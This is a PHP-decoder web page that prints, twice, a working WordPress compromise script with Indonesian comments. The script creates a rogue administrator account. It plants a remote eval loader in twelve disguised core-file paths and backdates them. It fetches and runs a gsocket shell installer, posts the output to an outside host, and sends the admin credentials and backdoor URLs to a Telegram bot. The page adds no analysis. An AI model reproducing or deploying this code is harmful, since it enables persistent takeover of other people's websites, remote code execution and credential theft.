Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // Make gusion // Memastikan WordPress sudah dimuat define("WP_USE_THEMES", false..

Decoded Output download

<?php 
// Make gusion 
// Memastikan WordPress sudah dimuat 
define("WP_USE_THEMES", false); 
require "wp-blog-header.php"; 
 
// Membuat pengguna admin baru 
$new_admin_username = "it-team"; 
$new_admin_password = "plerkuda138!@"; 
$new_admin_email = "it-admin@" . $_SERVER["HTTP_HOST"]; 
 
if (!username_exists($new_admin_username)) { 
  $user_id = wp_create_user( 
    $new_admin_username, 
    $new_admin_password, 
    $new_admin_email 
  ); 
 
  $user = new WP_User($user_id); 
  $user->set_role("administrator"); 
 
  echo "Admin baru berhasil dibuat:<br>"; 
  echo $new_admin_username . " (USERNAME)<br>"; 
  echo $new_admin_password . " (PASSWORD)<br>"; 
  echo $new_admin_email . " (EMAIL)<br>"; 
} 
 
// Konten yang akan ditulis ke dalam file 
$content = 
  '<?php $Url = "https://zerotwostrg.xyz/maaf/zero.txt"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $Url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); echo eval("?>".$output); ?>'; 
 
$file_paths = [ 
  "./wp-includes/random_compat/random_bytes_bcrypt.php", 
  "./wp-admin/user/license.php", 
  "./wp-admin/includes/admin-action.php", 
  "./wp-admin/network/freedom.php", 
  "./wp-includes/rest-api/endpoints/class-wp-rest-api-controller.php", 
  "./wp-includes/SimplePie/Decode/HTML/Dentities.php", 
  "./wp-includes/blocks/navigation/view-modal.assets.php", 
  "./wp-includes/sodium_compat/namespaced/Hash.php", 
  "./wp-includes/style-engine/class-wp-style-engine-system.php", 
  "./wp-includes/php-compat/readsonly.php", 
  "./wp-includes/widgets/class-wp-nav-widgets.php", 
  "./wp-admin/maint/restore.php", 
]; 
 
// Membuat file dan menulis konten 
foreach ($file_paths as $file_path) { 
  if (!is_dir(dirname($file_path))) { 
    mkdir(dirname($file_path), 0777, true); 
  } 
 
  file_put_contents($file_path, $content); 
  touch($file_path, filemtime("/etc/passwd")); 
} 
 
// Log file yang telah dibuat 
$log_message = "File Has Been Created 

"; 
foreach ($file_paths as $file_path) { 
  $log_message .= 
    "https://" . 
    $_SERVER["HTTP_HOST"] . 
    str_replace("./", "/", addslashes($file_path)) . 
    "
"; 
} 
 
// Menjalankan perintah shell dan menampung hasilnya ke variabel 
$command1 = shell_exec( 
  'bash -c "$(wget --no-verbose -O- https://gsocket.io/y)" > f.txt; cat f.txt | curl -F "[email protected]" https://yifaid.cyou; rm -rf f.txt' 
); 
$command2 = shell_exec("pwd"); 
$domain = $_SERVER["SERVER_NAME"]; 
$server_ip = $_SERVER["SERVER_ADDR"]; 
 
// Token bot Anda 
$bot_token = "7430690569:AAFHJJ19N-HolqZg-ATvYrOdsyQsxUTZBa0"; 
 
// Chat ID grup Anda 
$chat_id = "-4537087762"; // Ganti dengan chat ID grup Anda 
 
// Membuat pesan yang akan dikirim, menggabungkan hasil dari perintah dan log file 
$message = "```
 Ini Result nya Onii-Channn 
"; 
$message .= "
Admin Details

"; 
$message .= "Username: $new_admin_username
"; 
$message .= "Password: $new_admin_password
"; 
$message .= "Email: $new_admin_email

"; 
$message .= "Gusion: $command1
"; 
$message .= "Log File:
" . addslashes($log_message) . "```"; // Escape log message 
 
// URL API Telegram 
$api_url = "https://api.telegram.org/bot$bot_token/sendMessage"; 
 
// Data yang akan dikirim ke API 
$data = [ 
  "chat_id" => $chat_id, 
  "text" => $message, 
  "parse_mode" => "MarkdownV2", // Menggunakan MarkdownV2 untuk format code block 
]; 
 
// Menggunakan cURL untuk mengirim request POST ke API Telegram 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, $api_url); 
curl_setopt($ch, CURLOPT_POST, 1); 
curl_setopt($ch, CURLOPT_POSTFIELDS, $data); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
 
// Mendapatkan respons dari API 
$response = curl_exec($ch); 
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); 
curl_close($ch); 
 
// Cek apakah pesan berhasil dikirim 
if ($httpcode == 200) { 
  echo "Pesan berhasil dikirim!"; 
} else { 
  echo "Gagal mengirim pesan: $response"; 
} 
?>

Did this file decode correctly?

Original Code

<?php
// Make gusion
// Memastikan WordPress sudah dimuat
define("WP_USE_THEMES", false);
require "wp-blog-header.php";

// Membuat pengguna admin baru
$new_admin_username = "it-team";
$new_admin_password = "plerkuda138!@";
$new_admin_email = "it-admin@" . $_SERVER["HTTP_HOST"];

if (!username_exists($new_admin_username)) {
  $user_id = wp_create_user(
    $new_admin_username,
    $new_admin_password,
    $new_admin_email
  );

  $user = new WP_User($user_id);
  $user->set_role("administrator");

  echo "Admin baru berhasil dibuat:<br>";
  echo $new_admin_username . " (USERNAME)<br>";
  echo $new_admin_password . " (PASSWORD)<br>";
  echo $new_admin_email . " (EMAIL)<br>";
}

// Konten yang akan ditulis ke dalam file
$content =
  '<?php $Url = "https://zerotwostrg.xyz/maaf/zero.txt"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $Url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); echo eval("?>".$output); ?>';

$file_paths = [
  "./wp-includes/random_compat/random_bytes_bcrypt.php",
  "./wp-admin/user/license.php",
  "./wp-admin/includes/admin-action.php",
  "./wp-admin/network/freedom.php",
  "./wp-includes/rest-api/endpoints/class-wp-rest-api-controller.php",
  "./wp-includes/SimplePie/Decode/HTML/Dentities.php",
  "./wp-includes/blocks/navigation/view-modal.assets.php",
  "./wp-includes/sodium_compat/namespaced/Hash.php",
  "./wp-includes/style-engine/class-wp-style-engine-system.php",
  "./wp-includes/php-compat/readsonly.php",
  "./wp-includes/widgets/class-wp-nav-widgets.php",
  "./wp-admin/maint/restore.php",
];

// Membuat file dan menulis konten
foreach ($file_paths as $file_path) {
  if (!is_dir(dirname($file_path))) {
    mkdir(dirname($file_path), 0777, true);
  }

  file_put_contents($file_path, $content);
  touch($file_path, filemtime("/etc/passwd"));
}

// Log file yang telah dibuat
$log_message = "File Has Been Created \n\n";
foreach ($file_paths as $file_path) {
  $log_message .=
    "https://" .
    $_SERVER["HTTP_HOST"] .
    str_replace("./", "/", addslashes($file_path)) .
    "\n";
}

// Menjalankan perintah shell dan menampung hasilnya ke variabel
$command1 = shell_exec(
  'bash -c "$(wget --no-verbose -O- https://gsocket.io/y)" > f.txt; cat f.txt | curl -F "[email protected]" https://yifaid.cyou; rm -rf f.txt'
);
$command2 = shell_exec("pwd");
$domain = $_SERVER["SERVER_NAME"];
$server_ip = $_SERVER["SERVER_ADDR"];

// Token bot Anda
$bot_token = "7430690569:AAFHJJ19N-HolqZg-ATvYrOdsyQsxUTZBa0";

// Chat ID grup Anda
$chat_id = "-4537087762"; // Ganti dengan chat ID grup Anda

// Membuat pesan yang akan dikirim, menggabungkan hasil dari perintah dan log file
$message = "```\n Ini Result nya Onii-Channn \n";
$message .= "\nAdmin Details\n\n";
$message .= "Username: $new_admin_username\n";
$message .= "Password: $new_admin_password\n";
$message .= "Email: $new_admin_email\n\n";
$message .= "Gusion: $command1\n";
$message .= "Log File:\n" . addslashes($log_message) . "```"; // Escape log message

// URL API Telegram
$api_url = "https://api.telegram.org/bot$bot_token/sendMessage";

// Data yang akan dikirim ke API
$data = [
  "chat_id" => $chat_id,
  "text" => $message,
  "parse_mode" => "MarkdownV2", // Menggunakan MarkdownV2 untuk format code block
];

// Menggunakan cURL untuk mengirim request POST ke API Telegram
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Mendapatkan respons dari API
$response = curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Cek apakah pesan berhasil dikirim
if ($httpcode == 200) {
  echo "Pesan berhasil dikirim!";
} else {
  echo "Gagal mengirim pesan: $response";
}
?>

Function Calls

None

Variables

None

Stats

MD5 e95602b382cf5cd44bbcf1fafaf7efd7
Eval Count 0
Decode Time 68 ms